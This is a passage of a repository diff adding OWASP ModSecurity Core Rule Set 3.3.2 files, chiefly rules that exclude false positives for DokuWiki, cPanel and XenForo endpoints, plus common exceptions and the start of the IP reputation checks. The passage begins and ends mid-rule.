"t:none,\
chain"
SecRule &ARGS:do "@eq 1" \
"t:none,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2"
# [ Save config ]
#
# Allow the config to be saved:
# 942200: If the user adds "..." to tagline: ARGS:config[tagline]
# 942430: if ARGS:config[hidepages] has pages looking like sql statements
# 942430,942440: "--- //[[@MAIL@|@NAME@]] @DATE@//"]" in ARGS:config[signature]
SecRule REQUEST_FILENAME "@endsWith /doku.php" \
"id:9004370,\
phase:2,\
pass,\
t:none,\
nolog,\
noauditlog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:page "@streq config" \
"t:none,\
chain"
SecRule &ARGS:page "@eq 1" \
"t:none,\
chain"
SecRule REQUEST_METHOD "@streq POST" \
"t:none,\
chain"
SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \
"t:none,\
ctl:ruleRemoveTargetById=920230;ARGS:config[dformat],\
ctl:ruleRemoveTargetById=942200;ARGS:config[tagline],\
ctl:ruleRemoveTargetById=942430;ARGS:config[hidepages],\
ctl:ruleRemoveTargetById=942430-942440;ARGS:config[signature]"
# When the config loads after a save, it gets blocked because
# it has 'readdir' and lines that look like sql
# 942430,942440: "--- //[[@MAIL@|@NAME@]] @DATE@//"]" in ARGS:config[signature]
# 951240,953110: When the page reloads, it triggers
# postgres and php code disclosure rules.
SecRule REQUEST_FILENAME "@endsWith /doku.php" \
"id:9004380,\
phase:2,\
pass,\
t:none,\
nolog,\
noauditlog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule ARGS:page "@streq config" \
"t:none,\
chain"
SecRule &ARGS:page "@eq 1" \
"t:none,\
chain"
SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \
"t:none,\
ctl:ruleRemoveById=951240,\
ctl:ruleRemoveById=953110"
# End [ Admin Area ]
SecMarker "END-DOKUWIKI-ADMIN"
SecMarker "END-DOKUWIKI"

63
core/modsecurity/files/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf Normal file
View File

@@ -0,0 +1,63 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
# These exclusions remedy false positives in a default cPanel environment.
# The exclusions are only active if crs_exclusions_cpanel=1 is set.
# See rule 900130 in crs-setup.conf.example for instructions.
SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \
"id:9005000,\
phase:1,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-CPANEL"
SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \
"id:9005001,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-CPANEL"
#
# [ cPanel whm-server-status ]
#
# Cpanel's WHM auto generates requests to /whm-server-status from
# 127.0.0.1 (triggers rule 920280, non-blocking, log only) Once every 5 minutes.
# These false positives have a low impact (logged, non-blocking) to a large number of users (all cPanel admins).
#
#
# Rule to allow cPanel whm-server-status requests from localhost without log entry.
#
SecRule REQUEST_LINE "@rx ^GET /whm-server-status(?:/|/\?auto)? HTTP/[12]\.[01]$" \
"id:9005100,\
phase:1,\
pass,\
t:none,\
nolog,\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-apache',\
tag:'attack-generic',\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \
"t:none,\
ctl:ruleRemoveById=920280,\
ctl:ruleRemoveById=920350"
SecMarker "END-CPANEL"

586
core/modsecurity/files/coreruleset/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf Normal file
View File

@@ -0,0 +1,586 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
# These exclusions remedy false positives in a default XenForo install.
# The exclusions are only active if crs_exclusions_xenforo=1 is set.
# See rule 900130 in crs-setup.conf.example for instructions.
SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \
"id:9006000,\
phase:1,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-XENFORO"
SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \
"id:9006001,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-XENFORO"
#
# -=[ XenForo Front-End ]=-
#
# Proxy for images and remote content embedded in forum posts
# GET /xf/proxy.php?image=https://example.com/some.jpg&hash=foo
# GET /xf/proxy.php?link=https://example.com&hash=foo
# POST /xf/proxy.php, body: referrer=...
SecRule REQUEST_FILENAME "@endsWith /proxy.php" \
"id:9006100,\
phase:1,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:image,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:link,\
ctl:ruleRemoveTargetById=931130;ARGS:referrer,\
ctl:ruleRemoveTargetById=942230;ARGS:referrer,\
ver:'OWASP_CRS/3.3.2'"
# Store drafts for private message, forum post, thread reply
# POST /xf/conversations/draft
# POST /xf/conversations/convo-title.12345/draft
# POST /xf/forums/forum-title.12345/draft
# POST /xf/threads/thread-title-%E2%98%85.12345/draft
#
# attachment_hash_combined example:
# {"type":"post","context":{"post_id":12345},"hash":"0123456789abcdef..."}
SecRule REQUEST_FILENAME "@rx /(?:conversations|(?:conversations|forums|threads)/.*)/draft$" \
"id:9006110,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetById=931130;ARGS:href,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message_html,\
ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\
ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\
ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\
ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\
ver:'OWASP_CRS/3.3.2'"
# Send PM, edit post, create thread, reply to thread
# POST /xf/conversations/add
# POST /xf/conversations/add-preview
# POST /xf/conversations/messages/1463947/edit
# POST /xf/posts/12345/edit
# POST /xf/posts/12345/preview
# POST /xf/conversations/convo-title.12345/add-reply
# POST /xf/threads/thread-title.12345/add-reply
# POST /xf/threads/thread-title.12345/reply-preview
# POST /xf/forums/forum-title.12345/post-thread
# POST /xf/forums/blogs/post-thread
# POST /xf/forums/forum-title.12345/thread-preview
SecRule REQUEST_FILENAME "@rx /(?:conversations/add(?:-preview)?|conversations/messages/\d+/edit|posts/\d+/(?:edit|preview)|(?:conversations|threads)/.*\.\d+/(?:add-reply|reply-preview)|forums/.*/(?:post-thread|thread-preview))$" \
"id:9006120,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message_html,\
ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\
ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\
ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\
ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\
ver:'OWASP_CRS/3.3.2'"
# Quote
# POST /xf/posts/12345/quote
SecRule REQUEST_FILENAME "@rx /posts/\d+/quote$" \
"id:9006130,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:quoteHtml,\
ver:'OWASP_CRS/3.3.2'"
# Multi quote
# POST /xf/conversations/convo-title.12345/multi-quote
# POST /xf/threads/thread-title.12345/multi-quote
# quotes={"12345":["quote-html"]}
SecRule REQUEST_FILENAME "@rx /(?:conversations|threads)/.*\.\d+/multi-quote$" \
"id:9006140,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:quotes,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[0][value],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[1][value],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[2][value],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[3][value],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[4][value],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[5][value],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[6][value],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[7][value],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[8][value],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[9][value],\
ver:'OWASP_CRS/3.3.2'"
# Delete thread
# POST /xf/threads/thread-title.12345/delete
SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/delete$" \
"id:9006150,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetById=942130;ARGS:starter_alert_reason,\
ver:'OWASP_CRS/3.3.2'"
# Feature thread
# POST /xf/threads/thread-title.12345/feature-edit
SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/feature-edit$" \
"id:9006155,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:feature[feature_excerpt]"
# Inline moderate thread
# POST /xf/inline-mod/
SecRule REQUEST_FILENAME "@endsWith /inline-mod/" \
"id:9006160,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:author_alert_reason,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\
ver:'OWASP_CRS/3.3.2'"
# Warn member
# POST /xf/members/name.12345/warn
# POST /xf/posts/12345/warn
SecRule REQUEST_FILENAME "@rx /(?:members/.*\.\d+|posts/\d+)/warn$" \
"id:9006170,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:conversation_message,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:notes,\
ver:'OWASP_CRS/3.3.2'"
# Editor
SecRule REQUEST_URI "@endsWith /index.php?editor/to-html" \
"id:9006200,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:bb_code,\
ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\
ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\
ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\
ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\
ver:'OWASP_CRS/3.3.2'"
# Editor
SecRule REQUEST_URI "@endsWith /index.php?editor/to-bb-code" \
"id:9006210,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:html,\
ver:'OWASP_CRS/3.3.2'"
# Post attachment
# POST /xf/account/avatar
# POST /xf/attachments/upload?type=post&context[thread_id]=12345&hash=foo
SecRule REQUEST_FILENAME "@rx /(?:account/avatar|attachments/upload)$" \
"id:9006220,\
phase:1,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveById=200003,\
ctl:ruleRemoveTargetById=942220;ARGS:flowChunkSize,\
ctl:ruleRemoveTargetById=942440;ARGS:flowIdentifier,\
ctl:ruleRemoveTargetById=942440;ARGS:flowFilename,\
ctl:ruleRemoveTargetById=942440;ARGS:flowRelativePath,\
ver:'OWASP_CRS/3.3.2'"
# Media
# POST /xf/index.php?editor/media
SecRule REQUEST_URI "@endsWith /index.php?editor/media" \
"id:9006230,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetById=931130;ARGS:url,\
ctl:ruleRemoveTargetById=942130;ARGS:url,\
ver:'OWASP_CRS/3.3.2'"
# Emoji
# GET /xf/index.php?misc/find-emoji&q=(%0A%0A
SecRule REQUEST_URI "@rx /index\.php\?misc/find-emoji&q=" \
"id:9006240,\
phase:1,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetById=921151;ARGS:q,\
ver:'OWASP_CRS/3.3.2'"
# Login
# POST /xf/login/login
SecRule REQUEST_FILENAME "@endsWith /login/login" \
"id:9006300,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\
ver:'OWASP_CRS/3.3.2'"
# Register account
# POST /xf/register/register
# The password is passed in a variable-name form parameter. We don't
# want to exclude all parameters completely as this would cause an
# unacceptable bypass. So, we exclude only commonly hit rules.
SecRule REQUEST_FILENAME "@endsWith /register/register" \
"id:9006310,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetById=942130;ARGS,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:reg_key,\
ver:'OWASP_CRS/3.3.2'"
# Confirm account
# GET /xf/account-confirmation/name.12345/email?c=foo
SecRule REQUEST_FILENAME "@rx /account-confirmation/.*\.\d+/email$" \
"id:9006315,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:c"
# Edit account
# POST /xf/account/account-details
SecRule REQUEST_FILENAME "@endsWith /account/account-details" \
"id:9006320,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetById=931130;ARGS:custom_fields[picture],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:about_html,\
ver:'OWASP_CRS/3.3.2'"
# Lost password
# POST /xf/lost-password/user-name.12345/confirm?c=foo
SecRule REQUEST_FILENAME "@rx /lost-password/.*\.\d+/confirm$" \
"id:9006330,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:c,\
ver:'OWASP_CRS/3.3.2'"
# Set forum signature
# POST /xf/account/signature
SecRule REQUEST_FILENAME "@endsWith /account/signature" \
"id:9006340,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:signature_html,\
ver:'OWASP_CRS/3.3.2'"
# Search
# POST /xf/search/search
SecRule REQUEST_FILENAME "@endsWith /search/search" \
"id:9006400,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:keywords,\
ctl:ruleRemoveTargetById=942200;ARGS:constraints,\
ctl:ruleRemoveTargetById=942260;ARGS:constraints,\
ctl:ruleRemoveTargetById=942340;ARGS:constraints,\
ctl:ruleRemoveTargetById=942370;ARGS:constraints,\
ver:'OWASP_CRS/3.3.2'"
# Search within thread
# GET /xf/threads/foo.12345/page12?highlight=foo
SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/(?:page\d+)?$" \
"id:9006410,\
phase:1,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:highlight,\
ver:'OWASP_CRS/3.3.2'"
# Search within search result
# GET /xf/search/12345/?q=foo
SecRule REQUEST_FILENAME "@rx /search/\d+/$" \
"id:9006420,\
phase:1,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:q,\
ver:'OWASP_CRS/3.3.2'"
# Contact form
# POST /xf/misc/contact
SecRule REQUEST_FILENAME "@endsWith /misc/contact" \
"id:9006500,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:subject,\
ver:'OWASP_CRS/3.3.2'"
# Report post
# POST /xf/posts/12345/report
SecRule REQUEST_FILENAME "@rx /posts/\d+/report$" \
"id:9006510,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\
ver:'OWASP_CRS/3.3.2'"
# Alternate thread view route
# /xf/index.php?threads/title-having-some-sql.12345/
#
# Especially threads with the HAVING sql keyword are FP prone.
# This rule has some chains to narrow down the exclusion,
# making it harder for an attacker to abuse the ARGS_NAMES
# exclusion on other endpoints.
SecRule REQUEST_FILENAME "@endsWith /index.php" \
"id:9006600,\
phase:1,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule REQUEST_METHOD "@streq GET" \
"t:none,\
chain"
SecRule &ARGS "@eq 1" \
"t:none,\
chain"
SecRule REQUEST_URI "@rx /index\.php\?threads/.*\.\d+/$" \
"t:none,\
ctl:ruleRemoveTargetById=942100;ARGS_NAMES,\
ctl:ruleRemoveTargetById=942230;ARGS_NAMES"
# Browser fingerprint (DBTech security extension)
# May Contain various javascript/XSS false positives
SecRule REQUEST_URI "@endsWith /index.php?dbtech-security/fingerprint" \
"id:9006700,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[14][value],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[15][value],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[16][value],\
ver:'OWASP_CRS/3.3.2'"
# Get location info
SecRule REQUEST_FILENAME "@endsWith /misc/location-info" \
"id:9006710,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:location,\
ver:'OWASP_CRS/3.3.2'"
#
# -=[ XenForo Global Exclusions ]=-
#
# _xfRedirect, _xfRequestUri can appear on various endpoints.
# Cookies can appear on all endpoints.
SecAction \
"id:9006800,\
phase:1,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetById=931120;ARGS:_xfRedirect,\
ctl:ruleRemoveTargetById=941150;ARGS:_xfRedirect,\
ctl:ruleRemoveTargetById=942230;ARGS:_xfRedirect,\
ctl:ruleRemoveTargetById=942260;ARGS:_xfRedirect,\
ctl:ruleRemoveTargetById=931120;ARGS:_xfRequestUri,\
ctl:ruleRemoveTargetById=941150;ARGS:_xfRequestUri,\
ctl:ruleRemoveTargetById=942130;ARGS:_xfRequestUri,\
ctl:ruleRemoveTargetById=942230;ARGS:_xfRequestUri,\
ctl:ruleRemoveTargetById=942260;ARGS:_xfRequestUri,\
ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_csrf,\
ctl:ruleRemoveTargetById=942210;REQUEST_COOKIES:xf_csrf,\
ctl:ruleRemoveTargetById=942440;REQUEST_COOKIES:xf_csrf,\
ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_emoji_usage,\
ctl:ruleRemoveTargetById=942150;REQUEST_COOKIES:xf_emoji_usage,\
ctl:ruleRemoveTargetById=942410;REQUEST_COOKIES:xf_emoji_usage,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;REQUEST_COOKIES:xf_ls,\
ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_session,\
ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_user,\
ver:'OWASP_CRS/3.3.2'"
#
# -=[ XenForo Administration Back-End ]=-
#
# Skip this section for performance unless requested file is admin.php
SecRule REQUEST_FILENAME "!@endsWith /admin.php" \
"id:9006900,\
phase:1,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-XENFORO-ADMIN"
SecRule REQUEST_FILENAME "!@endsWith /admin.php" \
"id:9006901,\
phase:2,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-XENFORO-ADMIN"
# Admin edit user
# POST /xf/admin.php?users/the-user-name.12345/edit
SecRule REQUEST_URI "@rx /admin\.php\?users/.*\.\d+/edit$" \
"id:9006910,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[about],\
ctl:ruleRemoveTargetById=931130;ARGS:profile[website],\
ver:'OWASP_CRS/3.3.2'"
# Admin save user
# POST /xf/admin.php?users/the-user-name.12345/save
# Runs in phase 1 to be able to remove rule 200003.
SecRule REQUEST_URI "@rx /admin\.php\?users/.*\.\d+/save$" \
"id:9006920,\
phase:1,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveById=200003,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[occupation],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[personal_quote],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[about],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[signature],\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[sexuality],\
ctl:ruleRemoveTargetById=931130;ARGS:custom_fields[picture],\
ctl:ruleRemoveTargetById=931130;ARGS:profile[website],\
ver:'OWASP_CRS/3.3.2'"
# Admin edit forum notice
# POST /xf/admin.php?notices/0/save
# POST /xf/admin.php?notices/forum-name.12345/save
SecRule REQUEST_URI "@rx /admin\.php\?notices/(?:.*\.)?\d+/save$" \
"id:9006930,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\
ver:'OWASP_CRS/3.3.2'"
# Admin batch thread update
# POST /xf/admin.php?threads/batch-update/action
SecRule REQUEST_URI "@rx /admin\.php\?(?:threads|users)/batch-update/action$" \
"id:9006940,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetById=942200;ARGS:criteria,\
ctl:ruleRemoveTargetById=942260;ARGS:criteria,\
ctl:ruleRemoveTargetById=942330;ARGS:criteria,\
ctl:ruleRemoveTargetById=942340;ARGS:criteria,\
ctl:ruleRemoveTargetById=942370;ARGS:criteria,\
ver:'OWASP_CRS/3.3.2'"
# Edit forum theme
# POST /xf/admin.php?styles/title.1234/style-properties/group&group=basic
SecRule REQUEST_URI "@rx /admin\.php\?styles/" \
"id:9006950,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetById=942200;ARGS:json,\
ctl:ruleRemoveTargetById=942260;ARGS:json,\
ctl:ruleRemoveTargetById=942300;ARGS:json,\
ctl:ruleRemoveTargetById=942330;ARGS:json,\
ctl:ruleRemoveTargetById=942340;ARGS:json,\
ctl:ruleRemoveTargetById=942370;ARGS:json,\
ctl:ruleRemoveTargetById=942440;ARGS:json,\
ver:'OWASP_CRS/3.3.2'"
# Set forum options
# POST /xf/admin.php?options/update
SecRule REQUEST_URI "@rx /admin\.php\?options/update" \
"id:9006960,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:options[boardInactiveMessage],\
ver:'OWASP_CRS/3.3.2'"
# Edit pages/templates
# POST /xf/admin.php?pages/0/save
# POST /xf/admin.php?pages/foo.12345/save
# POST /xf/admin.php?templates/foo.1234/save
SecRule REQUEST_URI "@rx /admin\.php\?(?:pages|templates)/.*/save" \
"id:9006970,\
phase:2,\
pass,\
t:none,\
nolog,\
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:template,\
ver:'OWASP_CRS/3.3.2'"
SecMarker "END-XENFORO-ADMIN"
SecMarker "END-XENFORO"

54
core/modsecurity/files/coreruleset/rules/REQUEST-905-COMMON-EXCEPTIONS.conf Normal file
View File

@@ -0,0 +1,54 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
# This file is used as an exception mechanism to remove common false positives
# that may be encountered.
#
# Exception for Apache SSL pinger
#
SecRule REQUEST_LINE "@streq GET /" \
"id:905100,\
phase:1,\
pass,\
t:none,\
nolog,\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-apache',\
tag:'attack-generic',\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \
"t:none,\
ctl:ruleEngine=Off,\
ctl:auditEngine=Off"
#
# Exception for Apache internal dummy connection
#
SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \
"id:905110,\
phase:1,\
pass,\
t:none,\
nolog,\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-apache',\
tag:'attack-generic',\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule REQUEST_HEADERS:User-Agent "@endsWith (internal dummy connection)" \
"t:none,\
chain"
SecRule REQUEST_LINE "@rx ^(?:GET /|OPTIONS \*) HTTP/[12]\.[01]$" \
"t:none,\
ctl:ruleEngine=Off,\
ctl:auditEngine=Off"

326
core/modsecurity/files/coreruleset/rules/REQUEST-910-IP-REPUTATION.conf Normal file
View File

@@ -0,0 +1,326 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:910011,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:910012,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
#
# -=[ IP Reputation Block Flag Check ]=-
#
# The first check we do is to see if the client IP address has already
# been blacklisted by rules from previous requests.
#
# If the rule matches, it will do a skipAfter and pick up processing
# at the end of the request phase for actual blocking.
#
SecRule TX:DO_REPUT_BLOCK "@eq 1" \
"id:910000,\
phase:2,\
block,\
t:none,\
msg:'Request from Known Malicious Client (Based on previous traffic violations)',\
logdata:'Previous Block Reason: %{ip.reput_block_reason}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-reputation-ip',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain,\
skipAfter:BEGIN-REQUEST-BLOCKING-EVAL"
SecRule IP:REPUT_BLOCK_FLAG "@eq 1" \
"setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# -=[ GeoIP Checks ]=-
#
# This rule requires activating the SecGeoLookupDB directive
# in the crs-setup.conf file and specifying
# the list of blocked countries (tx.high_risk_country_codes).
#
# This rule does a GeoIP resolution on the client IP address.
#
SecRule TX:HIGH_RISK_COUNTRY_CODES "!@rx ^$" \
"id:910100,\
phase:2,\
block,\
t:none,\
msg:'Client IP is from a HIGH Risk Country Location',\
logdata:'%{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-reputation-ip',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule TX:REAL_IP "@geoLookup" \
"chain"
SecRule GEO:COUNTRY_CODE "@within %{tx.high_risk_country_codes}" \
"setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'ip.reput_block_flag=1',\
setvar:'ip.reput_block_reason=%{rule.msg}',\
expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'"
#
# -=[ IP Reputation Checks ]=-
#
# ModSecurity Rules from Trustwave SpiderLabs: IP Blacklist Alert
# Ref: http://www.modsecurity.org/projects/commercial/rules/
#
# This rule checks the client IP address against a list of recent IPs captured
# from the SpiderLabs web honeypot systems (last 48 hours).
#
#SecRule TX:REAL_IP "@ipMatchFromFile ip_blacklist.data" \
# "id:910110,\
# phase:2,\
# block,\
# t:none,\
# msg:'Client IP in Trustwave SpiderLabs IP Reputation Blacklist',\
# tag:'application-multi',\
# tag:'language-multi',\
# tag:'platform-multi',\
# tag:'attack-reputation-ip',\
# tag:'paranoia-level/1',\
# severity:'CRITICAL',\
# setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
# setvar:'ip.reput_block_flag=1',\
# setvar:'ip.reput_block_reason=%{rule.msg}',\
# expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'"
#
# First check if we have already run an @rbl check for this IP by checking in IP collection.
# If we have, then skip doing another check.
#
SecRule IP:PREVIOUS_RBL_CHECK "@eq 1" \
"id:910120,\
phase:2,\
pass,\
t:none,\
nolog,\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-reputation-ip',\
tag:'paranoia-level/1',\
